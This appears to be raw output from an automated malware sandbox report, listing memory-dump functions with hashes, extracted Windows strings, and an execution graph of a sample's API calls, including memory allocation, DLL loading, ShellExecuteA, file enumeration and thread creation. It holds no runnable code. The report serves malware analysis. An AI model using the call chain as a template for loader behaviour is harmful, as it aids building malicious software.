                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f93eb65134ed829c770336298af0d70232f5b4d631e13c21f50065a42e910d86
                                                    • Instruction ID: cd18effd09521368041ed873c22d27338742ce4d43d7b099f3cd02a1a6f0650c
                                                    • Opcode Fuzzy Hash: f93eb65134ed829c770336298af0d70232f5b4d631e13c21f50065a42e910d86
                                                    • Instruction Fuzzy Hash: DF90022161140502D50171584404616800AD7D1241F95C036A3024555ECB25CAA6A231
                                                    Function 012E2EE0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ce1b1f840ef82adf45bd002408df9fb4756825bd1e93c5164b09e259e372a25f
                                                    • Instruction ID: 3c5a9260be82a79a4f45fdc469fa757ef14a850ab0683ac70ecda0838f8d2bfb
                                                    • Opcode Fuzzy Hash: ce1b1f840ef82adf45bd002408df9fb4756825bd1e93c5164b09e259e372a25f
                                                    • Instruction Fuzzy Hash: 5090026121180403D540755848046078005D7D1302F55C025A3064555ECB29CD656235
                                                    Function 012E3010 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 60e9cd4ed41db9e24e3e502ad2f2d2aca51651a7a49858674a850f8ad9915abb
                                                    • Instruction ID: a6956ded2ddb0d5467464b9d4e6313600c9521dc61e8343de87c86443bda478b
                                                    • Opcode Fuzzy Hash: 60e9cd4ed41db9e24e3e502ad2f2d2aca51651a7a49858674a850f8ad9915abb
                                                    • Instruction Fuzzy Hash: 6A90022121184442D54072584804B0FC105D7E2202F95C02DA6156554CCA15C9695721
                                                    Function 012E3090 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fc41c0ae9e89bb1f14645022d84b2e0769daa0f656d6cc09b9f5cdfee4239903
                                                    • Instruction ID: b0f0fdbb3ffc3209d847080dc8f0348be86e4a1dc074907650722bd531f155f3
                                                    • Opcode Fuzzy Hash: fc41c0ae9e89bb1f14645022d84b2e0769daa0f656d6cc09b9f5cdfee4239903
                                                    • Instruction Fuzzy Hash: 0C90022125140802D540715884147078006D7D1601F55C025A2024554DC716CA7967B1
                                                    Function 012E39B0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9b32c49de9b73c7b3d663e4f9156d7bad4c61fbe09268e105b62204f8c52682a
                                                    • Instruction ID: 8e87a546aa990b8f368d37ea2e2db84fae49419446cb3f7daaf9e3661bb0c534
                                                    • Opcode Fuzzy Hash: 9b32c49de9b73c7b3d663e4f9156d7bad4c61fbe09268e105b62204f8c52682a
                                                    • Instruction Fuzzy Hash: 7290022125545102D550715C4404616C005F7E1201F55C035A2814594DC655C9696321
                                                    Function 012E3D10 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4e2494edffcea4d5675d568f9d2ce6502a45477887ad5b8334ed2e1e94307f90
                                                    • Instruction ID: a5dceed809d059b94700e836d13f440e404125589e19949e95d39656bbff3610
                                                    • Opcode Fuzzy Hash: 4e2494edffcea4d5675d568f9d2ce6502a45477887ad5b8334ed2e1e94307f90
                                                    • Instruction Fuzzy Hash: 8C90023121240142994072585804A4EC105D7E2302F95D429A2015554CCA14C9755321
                                                    Function 012E3D70 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3eec13ad915f2e18696e833e1e52696e41189f91a6c1254616769e8cef2db6c7
                                                    • Instruction ID: 0877f7edb873cd1bc3ea5324a1ad59437b5a32397171b1ab90912ce6da5c0d92
                                                    • Opcode Fuzzy Hash: 3eec13ad915f2e18696e833e1e52696e41189f91a6c1254616769e8cef2db6c7
                                                    • Instruction Fuzzy Hash: 0890023521140402D910715858046468046D7D1301F55D425A2424558DC754C9B5A221
                                                    Function 012E2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                    • Instruction ID: 8f5d19bb350a86a451e7a8bee718e3a36a70be2f60efc23d6a66b3930f5f9659
                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                    • Instruction Fuzzy Hash:
                                                    Function 012E2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    • Opcode ID: 9e22667f117e6fba2d81074240f3c76b2f06bc4b3eb7e06f16d8f05c073a31a6
                                                    • Instruction ID: ee242c3f1ad432d0c2b3a55cb651f580d30b9c5f308c690c0513e2cc11ac3a5a
                                                    • Opcode Fuzzy Hash: 9e22667f117e6fba2d81074240f3c76b2f06bc4b3eb7e06f16d8f05c073a31a6
                                                    • Instruction Fuzzy Hash: E65107B6A24157FFCB15DBAC889497EFBFCBB08241B508129E59AD3641D374DE00C7A0
                                                    Function 01352410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    • Opcode ID: f8fc6760348b463fab082070bb06eebfd6dcea330ccd86aba1e28e6516aa83e9
                                                    • Instruction ID: c695d77d5f1140e464643f93737d1e6467b323b45bb90a1ec9ee5e0af85612ac
                                                    • Opcode Fuzzy Hash: f8fc6760348b463fab082070bb06eebfd6dcea330ccd86aba1e28e6516aa83e9
                                                    • Instruction Fuzzy Hash: 9B5117B1A00645EEDF74DF6CC890C7FFBF9EB44608B048869E9D6D7642D6B4EA008760
                                                    Function 012D7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01314725
                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 013146FC
                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01314742
                                                    • ExecuteOptions, xrefs: 013146A0
                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 01314787
                                                    • Execute=1, xrefs: 01314713
                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01314655
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                    • API String ID: 0-484625025
                                                    • Opcode ID: 7937e950abe5c9d86ea959b524c4a9835a92282829127666c52e4b44a8a8dcea
                                                    • Instruction ID: cb475a6a4039c5c2d90dd7faf896ade641e40260fb652534e6b96ce2a4779c3f
                                                    • Opcode Fuzzy Hash: 7937e950abe5c9d86ea959b524c4a9835a92282829127666c52e4b44a8a8dcea
                                                    • Instruction Fuzzy Hash: E151483162021ABEEF24ABA8DC89FBD77BCEF14308F140499E605A71C0E7749A418F90
                                                    Function 01376940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                    • Instruction ID: 8731ddc7e6da95ef403abd128f49ff14602b051cc4ff94ad2254e1e4ecc59fbb
                                                    • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                    • Instruction Fuzzy Hash: 370256B1508742AFE315CF19C4A4A6FBBE5EFC8708F44892DF9894B260DB35E905CB52
                                                    Function 012EB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: +$-$0$0
                                                    • API String ID: 1302938615-699404926
                                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                    • Instruction ID: be0d711f68c60a374d89dd18ff8646da46627971be59af9c9d5378301038db9f
                                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                    • Instruction Fuzzy Hash: 0481E471E6524A8EEF29CF6CC8997FEBBF1AF45310F98411ADA51A7791C7308840CB61
                                                    Function 013520E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$[$]:%u
                                                    • API String ID: 48624451-2819853543
                                                    • Opcode ID: 14c94b76cbcf1efd2cbebfcefe1040b671055cf9787ecb542bcc146328fa2a6a
                                                    • Instruction ID: 7bacea98510de94b0dcc50cb99135b1088c6b9f702dd9304cfb8e9da8f25775b
                                                    • Opcode Fuzzy Hash: 14c94b76cbcf1efd2cbebfcefe1040b671055cf9787ecb542bcc146328fa2a6a
                                                    • Instruction Fuzzy Hash: 24215E7AA10119ABDB50DE79DC44EFFBBF9AF54A44F44012AEE05E3201E7309A018BA5
                                                    Function 012CF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 013102BD
                                                    • RTL: Re-Waiting, xrefs: 0131031E
                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 013102E7
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                    • API String ID: 0-2474120054
                                                    • Opcode ID: 889c662738c0a4d708c070e0805c105b48065668fb8a0b8365ce2e18c1b18237
                                                    • Instruction ID: 56c8d5a0929173accf8ab708d4e120cad9f7ad86ed2d67fa281cff7b63383c00
                                                    • Opcode Fuzzy Hash: 889c662738c0a4d708c070e0805c105b48065668fb8a0b8365ce2e18c1b18237
                                                    • Instruction Fuzzy Hash: 23E1CF306247429FD729CF28C985B6ABBE1BB84718F240B2DF6A5CB2D1D774D845CB42
                                                    Function 012DBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • RTL: Resource at %p, xrefs: 01317B8E
                                                    • RTL: Re-Waiting, xrefs: 01317BAC
                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01317B7F
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 0-871070163
                                                    • Opcode ID: b0135b3dde3a0a1a5d9e1b8fefd002da26534e3deb60dd2e0c4dc2bac246a2c6
                                                    • Instruction ID: 66010895f81a04b090c2bae75af1d68ae44bc64d64902f358e86aee65d5158e5
                                                    • Opcode Fuzzy Hash: b0135b3dde3a0a1a5d9e1b8fefd002da26534e3deb60dd2e0c4dc2bac246a2c6
                                                    • Instruction Fuzzy Hash: 904114353107038FDB24DE29C851B6AB7E5FF8A714F100A2DFA96D7280DB71E4058B91
                                                    Function 012DB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0131728C
                                                    Strings
                                                    • RTL: Resource at %p, xrefs: 013172A3
                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01317294
                                                    • RTL: Re-Waiting, xrefs: 013172C1
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-605551621
                                                    • Opcode ID: 1035bf24abef857f18b6b7f16abc295d16437300100f8cb223f58adc342fee5c
                                                    • Instruction ID: 64219ff3ef8527f66f409224a699964b9f853a96133feaa4fb225c6c81ec5441
                                                    • Opcode Fuzzy Hash: 1035bf24abef857f18b6b7f16abc295d16437300100f8cb223f58adc342fee5c
                                                    • Instruction Fuzzy Hash: F7412335710203ABD725DE29CC41FA6B7A5FF99718F240619F955EB280DB30E80387D1
                                                    Function 01352300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$]:%u
                                                    • API String ID: 48624451-3050659472
                                                    • Opcode ID: fc58e02a3b8cce13921b3189860f46df7346d2bb31d26814c0530e968bc03816
                                                    • Instruction ID: da3b79ca172b7486aaf8d05af2a83eebbfd8c85fa4a210bae7a1d58921d90654
                                                    • Opcode Fuzzy Hash: fc58e02a3b8cce13921b3189860f46df7346d2bb31d26814c0530e968bc03816
                                                    • Instruction Fuzzy Hash: EF314572A10119DFDB60DE2DDC40FAFB7F8BB54614F444559ED49E3241EB309A498BA0
                                                    Function 012E7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: +$-
                                                    • API String ID: 1302938615-2137968064
                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                    • Instruction ID: 77a1e674fa0943d14e9422c9bc2371c5dc01d83dc98f6e90bb844e6383376f8e
                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                    • Instruction Fuzzy Hash: 3B91C671E202079BEF24DF6DC8996BEBBE5FF44320F98451AEA55E72C0E77089408791
                                                    Function 012A9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $$@
                                                    • API String ID: 0-1194432280
                                                    • Opcode ID: 876c969385bc9f51c435170f5342c2e4af17e3f7354496c9c903b4b320ae3986
                                                    • Instruction ID: 472adfab9f9d37f238018908318fb0a1f6bb8891e8992644768de455e4f431b3
                                                    • Opcode Fuzzy Hash: 876c969385bc9f51c435170f5342c2e4af17e3f7354496c9c903b4b320ae3986
                                                    • Instruction Fuzzy Hash: 9C812C71D10269DBDB32CB54CC55BEEB7B8AB08754F0041EAEA09B7280D7705E84CFA4

                                                    Execution Graph

                                                    Execution Coverage:2.7%
                                                    Dynamic/Decrypted Code Coverage:4%
                                                    Signature Coverage:1.5%
                                                    Total number of Nodes:473
                                                    Total number of Limit Nodes:73
                                                    execution_graph 100256 5a821e 100257 5a8223 100256->100257 100258 5a81e2 100257->100258 100260 5a6c90 LdrInitializeThunk LdrInitializeThunk 100257->100260 100260->100258 100261 599790 100262 599b3f 100261->100262 100264 59a01b 100262->100264 100265 5b9b40 100262->100265 100266 5b9b66 100265->100266 100271 594090 100266->100271 100268 5b9b72 100270 5b9ba0 100268->100270 100274 5b4610 100268->100274 100270->100264 100278 5a31d0 100271->100278 100273 59409d 100273->100268 100275 5b466a 100274->100275 100277 5b4677 100275->100277 100289 5a1670 100275->100289 100277->100270 100279 5a31e7 100278->100279 100281 5a3200 100279->100281 100282 5b8a10 100279->100282 100281->100273 100283 5b8a28 100282->100283 100284 5b8a4c 100283->100284 100285 5b7660 LdrInitializeThunk 100283->100285 100284->100281 100286 5b8aa1 100285->100286 100287 5b9eb0 RtlFreeHeap 100286->100287 100288 5b8aba 100287->100288 100288->100281 100290 5a16ab 100289->100290 100305 5a78d0 100290->100305 100292 5a16b3 100293 5a1982 100292->100293 100294 5b9f90 RtlAllocateHeap 100292->100294 100293->100277 100295 5a16c9 100294->100295 100296 5b9f90 RtlAllocateHeap 100295->100296 100297 5a16da 100296->100297 100298 5b9f90 RtlAllocateHeap 100297->100298 100300 5a16eb 100298->100300 100304 5a177e 100300->100304 100320 5a6720 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 100300->100320 100301 5a44a0 LdrLoadDll 100302 5a193f 100301->100302 100316 5b6d30 100302->100316 100304->100301 100306 5a78fc 100305->100306 100307 5a77c0 2 API calls 100306->100307 100308 5a791f 100307->100308 100309 5a7929 100308->100309 100310 5a7941 100308->100310 100311 5a7934 100309->100311 100313 5b7fc0 NtClose 100309->100313 100312 5a795d 100310->100312 100314 5b7fc0 NtClose 100310->100314 100311->100292 100312->100292 100313->100311 100315 5a7953 100314->100315 100315->100292 100317 5b6d8a 100316->100317 100319 5b6d97 100317->100319 100321 5a19a0 100317->100321 100319->100293 100320->100304 100324 5a19c0 100321->100324 100337 5a7ba0 100321->100337 100323 5a1ea5 100323->100319 100324->100323 100341 5b07b0 100324->100341 100327 5a1bc1 100329 5bb0c0 2 API calls 100327->100329 100328 5a1a1e 100328->100323 100344 5baf90 100328->100344 100331 5a1bd6 100329->100331 100330 5a7b40 LdrInitializeThunk 100333 5a1c01 100330->100333 100331->100333 100349 5a0630 100331->100349 100333->100323 100333->100330 100335 5a0630 LdrInitializeThunk 100333->100335 100334 5a7b40 LdrInitializeThunk 100336 5a1d2f 100334->100336 100335->100333 100336->100333 100336->100334 100338 5a7bad 100337->100338 100339 5a7bce SetErrorMode 100338->100339 100340 5a7bd5 100338->100340 100339->100340 100340->100324 100342 5b9e20 NtAllocateVirtualMemory 100341->100342 100343 5b07d1 100342->100343 100343->100328 100345 5bafa0 100344->100345 100346 5bafa6 100344->100346 100345->100327 100347 5b9f90 RtlAllocateHeap 100346->100347 100348 5bafcc 100347->100348 100348->100327 100352 5b8240 100349->100352 100353 5b825a 100352->100353 100356 4812c70 LdrInitializeThunk 100353->100356 100354 5a0652 100354->100336 100356->100354 99894 5a5750 99899 5a7b40 99894->99899 99896 5a5780 99898 5a57ac 99896->99898 99903 5a7ac0 99896->99903 99900 5a7b53 99899->99900 99910 5b7570 99900->99910 99902 5a7b7e 99902->99896 99904 5a7b04 99903->99904 99905 5a7b25 99904->99905 99916 5b7370 99904->99916 99905->99896 99907 5a7b15 99908 5a7b31 99907->99908 99921 5b7fc0 99907->99921 99908->99896 99911 5b75e3 99910->99911 99912 5b7594 99910->99912 99915 4812dd0 LdrInitializeThunk 99911->99915 99912->99902 99913 5b7608 99913->99902 99915->99913 99917 5b73e2 99916->99917 99919 5b7394 99916->99919 99924 4814650 LdrInitializeThunk 99917->99924 99918 5b7407 99918->99907 99919->99907 99922 5b7fdd 99921->99922 99923 5b7fee NtClose 99922->99923 99923->99905 99924->99918 99925 5b4fd0 99926 5b502a 99925->99926 99928 5b5037 99926->99928 99929 5b2b60 99926->99929 99936 5b9e20 99929->99936 99931 5b2c9c 99931->99928 99932 5b2ba1 99932->99931 99939 5a44a0 99932->99939 99934 5b2c20 Sleep 99935 5b2be7 99934->99935 99935->99931 99935->99934 99943 5b8120 99936->99943 99938 5b9e51 99938->99932 99940 5a44c4 99939->99940 99941 5a4500 LdrLoadDll 99940->99941 99942 5a44cb 99940->99942 99941->99942 99942->99935 99944 5b81aa 99943->99944 99946 5b8144 99943->99946 99945 5b81c0 NtAllocateVirtualMemory 99944->99945 99945->99938 99946->99938 100357 5b7610 100358 5b762d 100357->100358 100361 4812df0 LdrInitializeThunk 100358->100361 100359 5b7655 100361->100359 100367 5b1a90 100372 5b1990 LdrLoadDll 100367->100372 100369 5b1aa5 100370 5a44a0 LdrLoadDll 100369->100370 100371 5b1ce8 100369->100371 100370->100371 100372->100369 100378 4812ad0 LdrInitializeThunk 99947 5a30cc 99952 5a77c0 99947->99952 99950 5a30f1 99951 5b7fc0 NtClose 99951->99950 99953 5a77da 99952->99953 99957 5a30dc 99952->99957 99958 5b7700 99953->99958 99956 5b7fc0 NtClose 99956->99957 99957->99950 99957->99951 99959 5b771d 99958->99959 99962 48135c0 LdrInitializeThunk 99959->99962 99960 5a78aa 99960->99956 99962->99960 99963 59ecc0 99964 59ece3 99963->99964 99965 5a44a0 LdrLoadDll 99964->99965 99966 59ed2c 99965->99966 99967 59edef ShellExecuteA 99966->99967 99968 59ed58 99966->99968 99967->99968 100379 59b480 100380 5b9e20 NtAllocateVirtualMemory 100379->100380 100381 59caf1 100379->100381 100380->100381 99969 5a6e40 99970 5a6e5c 99969->99970 99973 5a6ea7 99969->99973 99972 5b7fc0 NtClose 99970->99972 99970->99973 99971 5a6fca 99974 5a6e73 99972->99974 99973->99971 99980 5a6250 NtClose LdrInitializeThunk LdrInitializeThunk 99973->99980 99979 5a6250 NtClose LdrInitializeThunk LdrInitializeThunk 99974->99979 99976 5a6faa 99976->99971 99981 5a6420 NtClose LdrInitializeThunk LdrInitializeThunk 99976->99981 99979->99973 99980->99976 99981->99971 100382 5abe80 100384 5abea9 100382->100384 100383 5abfad 100384->100383 100385 5abf53 FindFirstFileW 100384->100385 100385->100383 100386 5abf6e 100385->100386 100387 5abf94 FindNextFileW 100386->100387 100387->100386 100388 5abfa6 FindClose 100387->100388 100388->100383 100389 5b4a00 100390 5b4a5d 100389->100390 100391 5b4a98 100390->100391 100394 5b0a80 100390->100394 100393 5b4a7a 100395 5b0a8e 100394->100395 100396 5b0a2f 100394->100396 100397 5b7fc0 NtClose 100396->100397 100398 5b0a64 100397->100398 100398->100393 99982 5a2747 99985 5a5fc0 99982->99985 99984 5a2773 99986 5a5ff3 99985->99986 99987 5a6017 99986->99987 99992 5b7b60 99986->99992 99987->99984 99989 5a603a 99989->99987 99990 5b7fc0 NtClose 99989->99990 99991 5a60ba 99990->99991 99991->99984 99993 5b7b7d 99992->99993 99996 4812ca0 LdrInitializeThunk 99993->99996 99994 5b7ba9 99994->99989 99996->99994 99997 5a95fb 99998 5a960a 99997->99998 100000 5a9611 99998->100000 100001 5b9eb0 99998->100001 100004 5b8320 100001->100004 100003 5b9ec9 100003->100000 100005 5b833a 100004->100005 100006 5b834b RtlFreeHeap 100005->100006 100006->100003 100401 599730 100402 59973f 100401->100402 100403 599780 100402->100403 100404 59976d CreateThread 100402->100404 100007 5a6a70 100008 5a6a9a 100007->100008 100011 5a7970 100008->100011 100010 5a6ac4 100012 5a798d 100011->100012 100018 5b7750 100012->100018 100014 5a79dd 100015 5a79e4 100014->100015 100023 5b7820 100014->100023 100015->100010 100017 5a7a0d 100017->100010 100019 5b7774 100018->100019 100020 5b77e0 100018->100020 100019->100014 100028 4812f30 LdrInitializeThunk 100020->100028 100021 5b7819 100021->100014 100024 5b78bf 100023->100024 100025 